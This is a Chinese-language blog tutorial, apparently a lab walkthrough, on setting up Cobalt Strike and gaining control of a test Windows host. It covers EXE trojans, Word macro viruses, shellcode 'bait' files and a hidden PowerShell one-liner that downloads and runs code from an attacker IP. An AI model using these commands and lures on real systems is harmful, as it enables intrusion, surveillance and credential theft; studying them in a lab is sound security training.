CS(Ctwo)

2023-12-13 04:13:30

CS(Ctwo)

Cobalt Strike是一个命令和控制的终端工具

默认50050端口

? Cobalt Strike是一款基于java的渗透测试神器,常被业界人称为CS神器。自3.0以后已经不在使用Metasploit框架而作为一个独立的平台使用,分为客户端与服务端,服务端是一个,客户端可以有多个,非常适合团队协同作战,多个攻击者可以同时连接到一个团队服务器上,共享攻击资源与目标信息和sessions,可模拟APT做模拟对抗,进行内网渗透。

? Cobalt Strike集成了端口转发、服务扫描,自动化溢出,多模式端口监听,win exe木马生成,win dll木马生成,java木马生成,office宏病毒生成,木马捆绑;钓鱼攻击包括:站点克隆,目标信息获取,java执行,浏览器自动攻击等等

image-20231212100059152

实际操作

win11

  • 打开cs(右击——打开文件所在位置)

image-20231212100229271

  • 导出server
  • 放在kali中

image-20231212110317179

kali

设置执行权限

sudo chmod 777 *

image-20231212110611264

  • 执行脚本
sudo ./teamserver
  • 发现报错

image-20231212100813800

  • 启动服务器
sudo ./teamserver kali的iIP 123456

image-20231212100924838

  • 启动成功

成功启动后,发现有一串SSL证书的哈希

image-20231212111303732

win11中双击cs,弹出一个框

  • 添加相关信息
  • 点击连接

image-20231212111707789

  • 对比哈希值以及证书,发现一样,说明正确

  • 正常交换公钥

image-20231212101231892

成功进入cs控制台

image-20231212112448216

工具栏解释

image-20231212142905829

1.新建连接
2.断开当前连接
3.监听器
4.改变视图为Pivot Graph(视图列表)
5.改变视图为Session Table(会话列表)
6.改变视图为Target Table(目标列表)
7.显示所有以获取的受害主机的凭证
8.查看已下载文件
9.查看键盘记录结果
10.查看屏幕截图
11.生成无状态的可执行exe木马
12.使用java自签名的程序进行钓鱼攻击
13.生成office宏病毒文件
14.为payload提供web服务以便下载和执行
15.提供文件下载,可以选择Mime类型
16.管理Cobalt Strike上运行的web服务
17.帮助
18.关于

上线木马

手法

EXE病毒
  • 查看kali开放的端口
sudo ss -antpl

image-20231212113010140

  • 在cs工具中添加listeners

image-20231212113907764

  • 在服务器上开启了一个6666端口
  • 6666端口是用来接收木马反连过来的控制权限

image-20231212114015170

  • 查看kali开放的端口
sudo ss -antpl
  • 6666端口开放成功

image-20231212114454158

  • 生成木马

image-20231212114612681

image-20231212114707043

image-20231212114804748

成功生成木马

使用木马
  • 双击木马

image-20231212115005803

  • 生成木马成功

  • 成功控制桌面

image-20231212115427462

宏病毒
  • 在主机上新建一个文档,打开(试图——宏),并创建test用户

image-20231212162727330

image-20231212162758543

  • 在win11中创建宏

image-20231212163806167

image-20231212163922166

  • 复制教程

image-20231212164151033

  • 将教程回到主机上word的宏——点击保存

image-20231212164515536

  • 查看宏有内容

image-20231212164831018

  • 发现主机上线了

image-20231212165147307

  • 测试访问主机的桌面

  • 成功访问到主机的桌面

image-20231212165434200

关闭上线操作
  • 点击主机最下面的任务管理器

  • 找到rundll,33990的端口,结束进程

  • 在win11中找到上线的ip,选择Session——remove移除

PowerShell(脚本病毒)

后缀名为ps1

  • 生成PowerShell
  • 提供了一个进攻网页

image-20231212173755203

image-20231212175037585

  • 复制命令

image-20231212175358997

  • 在命令终端打开,并执行
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.63.129:1111/a'))"

image-20231212175540458

  • win11成功上线
ShellCode

目前最火,最为使用的一种上线方式

安装插件

image-20231212192754145

image-20231212193113484

安装完成

image-20231212193318397

生成木马

image-20231212190409910

image-20231212190529790

  • 保存在桌面

image-20231212190631276

生成好的shellcode需要借助加载器才能变成可执行脚本

制作鱼饵

image-20231212202704970

image-20231212202851407

image-20231212203751764

image-20231212204010104

image-20231212204041477

image-20231212204155798

鱼饵制作成功

image-20231212204532555

image-20231212204710290

双击鱼饵

image-20231212205444379

  • 双击鱼饵前

image-20231212205214611

  • 双击鱼饵后

image-20231212205306614

上线成功

文章来源:https://blog.csdn.net/xy_wjyjw/article/details/134959448
本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。